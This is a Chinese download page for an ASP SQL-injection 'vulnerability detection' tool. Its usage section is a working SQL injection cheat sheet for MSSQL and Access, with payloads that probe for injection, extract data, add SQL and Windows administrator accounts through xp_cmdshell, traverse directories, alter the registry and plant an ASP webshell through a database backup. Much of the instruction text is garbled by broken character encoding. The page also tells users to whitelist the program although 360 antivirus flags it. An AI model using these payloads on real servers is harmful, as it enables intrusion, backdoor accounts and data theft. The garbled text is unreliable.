软件大小:1.03MB | 软件语言:简体中文 |
软件授权:绿色版 | 软件类别:网络检测 |
软件等级: | 更新时间:2015-07-29 |
应用平台:/Win8/Win7/WinXP |
网站漏洞检测工具是一款功能强大的网站漏洞检测软件。网站漏洞检测工具能帮助网站管理者快速地找出网站中存在的各种漏洞,以便进行修复,杜绝网站中的数据被盗取。推荐各位站长大人可以下载下来检测网站是否存在漏洞,避免因这些漏洞引起不必要的损失。
网站漏洞检测工具简介:
网站漏洞检测工具是一款由VB语言编写的ASP注入漏洞检测工具,特别在SQL Server注入检测方面有极高的准确率。
网站漏洞检测工具使用说明:
1.ÅжÏÊÇ·ñÓÐ×¢Èë
;and 1=1
;and 1=2
2.³õ²½ÅжÏÊÇ·ñÊÇmssql
;and user>0
3.ÅжÏÊý¾Ý¿âϵͳ
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.×¢Èë²ÎÊýÊÇ×Ö·û
'and [²éѯÌõ¼þ] and ''='
5.ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ
'and [²éѯÌõ¼þ] and '%25'='
6.²ÂÊý¾Ý¿â
;and (Select Count(*) from [Êý¾Ý¿âÃû])>0
7.²Â×Ö¶Î
;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
8.²Â×Ö¶ÎÖмǼ³¤¶È
;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
9.(1)²Â×ֶεÄasciiÖµ(access)
;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
(2)²Â×ֶεÄasciiÖµ(mssql)
;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
10.²âÊÔȨÏ޽ṹ(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.Ìí¼ÓmssqlºÍϵͳµÄÕÊ»§
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)±éÀúĿ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('Éϲ½µÃµ½µÄpaths'))>)
(2)±éÀúĿ¼
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- »ñµÃµ±Ç°ËùÓÐÇý¶¯Æ÷
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- »ñµÃ×ÓĿ¼Áбí
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- »ñµÃËùÓÐ×ÓĿ¼µÄĿ¼Ê÷½á¹¹
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- ²é¿´ÎļþµÄÄÚÈÝ
13.mssqlÖеĴ洢¹ý³Ì
xp_regenumvalues ×¢²á±í¸ù¼ü, ×Ó¼ü
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' ÒÔ¶à¸ö¼Ç¼¼¯·½Ê½·µ»ØËùÓмüÖµ
xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'CommonFilesDir' ·µ»ØÖƶ¨¼üµÄÖµ
xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÀàÐÍ, Öµ
ÖµÀàÐÍÓÐ2ÖÖREG_SZ ±íʾ×Ö·ûÐÍ,REG_DWORD ±íʾÕûÐÍ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName','reg_sz','hello' дÈë×¢²á±í
xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName' ɾ³ýij¸öÖµ
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' ɾ³ý¼ü,°üÀ¨¸Ã¼üÏÂËùÓÐÖµ
14.mssqlµÄbackup´´½¨webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
15.mssqlÄÚÖú¯Êý
;and (select @@version)>0 »ñµÃWindowsµÄ°æ±¾ºÅ
;and user_name()='dbo' Åжϵ±Ç°ÏµÍ³µÄÁ¬½ÓÓû§ÊDz»ÊÇsa
;and (select user_name())>0 ±¬µ±Ç°ÏµÍ³µÄÁ¬½ÓÓû§
;and (select db_name())>0 µÃµ½µ±Ç°Á¬½ÓµÄÊý¾Ý¿â
16.¼ò½àµÄwebshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
ÇëÇóµÄʱºò£¬ÏñÕâÑù×ÓÓãº
http://ip/l.asp?c=dir
注意事项
本软件被360报毒,请自行斟酌,如需使用请将软件加入360信任列表。